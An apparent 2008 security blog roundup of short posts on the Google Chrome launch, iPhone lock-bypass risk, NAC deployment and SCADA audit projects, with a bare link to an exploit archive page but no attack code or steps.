IMHO:

Firefox > (INSERT CHROME HERE) > Opera > Safari > IE7 > IE8 > IE6

In other news: Yousif Yalda has made it to the coveted “Stupid People” link category, which until now was held solely by Ashley Park.

And the hits just keep rolling in:

AUTOMATIC DOWNLOADS? What?! http://www.milw0rm.com/exploits/6355

August SCADApedia Entries [Digital Bond]

Posted: 03 Sep 2008 10:18 AM CDT

SCADApedia - - all can read - - subscribers can write.

New entries in August:

A number of the other pages have been updated as well.

You may also want to look at All Pages or the links to Control System Vulnerability Notes or the links to Digital Bond’s Research Projects.

Google Chrome [Kees Leune]

Posted: 03 Sep 2008 09:15 AM CDT

Google released its own web browser, named Chrome, yesterday, and many blog posts have already been dedicated to it.

I agree with Martin McKeay's judgement: "So what?" The browser seems to have some interesting ideas, but it does not warrant switching over to it. I'm not sure if Google is trying to make a serious attempt at getting into the desktop browser market, or if they want to use the product to push the envelope of technology by demonstrating that certain enhancements are possible in production-quality code.

The fact that Chrome installs (and runs) on Windows without administrator privileges is interesting though. Another thing that we have to remember is that Google will probably package it with their bundle. Basically, anyone downloading Picasa or Google Earth will probably end up with a copy on their system. Even if they never use that, it is yet another source of potentially insecure code.

We'll see; I haven't seen anything that would prompt me to go in and switch my default browser to Chrome. I'll use it to see if a page renders properly when I'm testing something, but I also do that with IE, FF, Konqueror, Opera, Safari, etc.

I'm not entirely sure that Google's strategy is for this. I agree with the observation made in Martin's podcast: this will probably take away from Firefox's market share much more than it will take away from IE (if any effect can be seen at all).

I stole an iPhone... NOW WHAT?! [Donkey On A Waffle]

Posted: 03 Sep 2008 08:49 AM CDT

I was just spending a bit of time catching up on my blogosphere reading this morning when I was intrigued by a statement made by none other than my brother. Over at his AtariNinja.org blog, he authored a brief piece downplaying the risk of the latest iPhone screen lock bypass hack. While I agree with nearly all of his points, one line stood out from the rest.

This is a serious bug but I really don't suspect people stealing iPhones are doing it to get at your personal information. They are likely after the hardware to sell.

I'm not entirely sure I agree on this subject. While the comment makes sense at face value, and indeed the majority of iPhone thefts today are primarily geared at the resale value of the hardware itself, why wouldn't a thief at least entertain the opportunity to peruse and potentially abuse the data on the stolen device? Given the fact that it's apparently quite trivial to bypass the phone's security screen lock features, what economic opportunity cost is there that would stop a "bad guy" from at least reviewing your data for potential money making opportunities? If a thief steals a car, they wouldn't ignore what's in the trunk and just sell the car (hardware) off quickly. I'd imagine they would pop the trunk (trivial to pass the trunk lock once you're in the car) and see what is inside to plunder.

Because of the above opinions, the risk of the iPhone screen lock bypass vulnerability is quite high dependent upon what data you have stored in your phone. Sure there are some mitigating factors, as wxs has outlined in his post, but they don't lessen the risk of the vulnerability, instead they only serve to lower the likelihood of exploit.

What are your thoughts on the issue? Is the business risk of the iPhone screen lock bypass vulnerability really that high? Or are the majority of criminals in the world just going to wipe and sell your phone to the highest bidder on eBay? I don't know about you, but I'm not leaving my data to chance... (comments are open)

Humans - the weakest chain in the link? [StillSecure, After All These Years]

Posted: 03 Sep 2008 07:57 AM CDT

The old adage that you are only as strong as your weakest link is a fundamental truth in security.  According to Tim Greene, the weakest link in the chain of protection that NAC can provide is too often the human being behind the computer. Tim relays in his most recent NAC newsletter the experience of a college IT administrator who when they turned NAC on flooded his help desk with calls from students who could not remediate their own computers.  This is a real problem.  Tim points out that this is a good reason why you should not turn on enforcement right away.  This gives you a chance to profile the devices on your networks and work on getting them to look like what you want before you enforce.  This is right in line with a "phased approach to NAC", a white paper we have done at StillSecure. 

It also points out another issue I have written about before. Too many NAC vendors have "self-remediation" as their solution for getting computers up to speed. Fact is, for non-IT personnel, self-remediation is just not a viable option. Your NAC product needs to have other options around patching and remediating devices.

Also, I just don't understand colleges that are content to test a device once a semester.  Tim's article mentions this too.  Once you have gone through the trouble of setting NAC up, it doesn't cost you anything more to test these devices every time they come on the network. Defeats the whole purpose if you ask me.

Sucking the chrome off a bumper [StillSecure, After All These Years]

Posted: 03 Sep 2008 07:41 AM CDT

There you have it, my entry into the chrome blogosphere sweepstakes.  In my years of blogging and more years of reading blogs, I have never seen such coverage of a new product launch or any other topic for that matter.  Maybe I should start a Chrome Bloggers Network?  Did Google pay bloggers to write about it?  Did I miss the memo about the prize for the best blog post on Chrome?

Personally, the geek in me had me download it. I played with it, looked at a bunch of sites and then put it in the same place I keep Safari. No icon anywhere on the desktop and who knows if I will open it again over the next year. I like Firefox. I hope the Google marketing machine will not hurt the Mozilla team.

Bandolier Update: New Applications on the List [Digital Bond]

Posted: 03 Sep 2008 07:25 AM CDT

Big news for Bandolier… last week at the PCSF Annual Meeting (now called the Process Control Systems Industry Conference), we presented on the project and unveiled an updated list of audit files. Newcomers include the AREVA eTerra and Emerson Ovation applications among others. Check out the complete list in the presentation or over at the List of Bandolier Audit Files SCADApedia article.

We are excited about the cross-section and industry saturation represented in the Bandolier project. Don’t forget, some of the audit files are available now in alpha versions. Stay tuned for a beta release of those and several more from the list. As always, we welcome your feedback and look forward to getting more of these audit files into the hands of asset owners and operators.

1 comment:

Rizash said...

Wow, you have a great blog. Very informative too. I’ll be visiting next time…

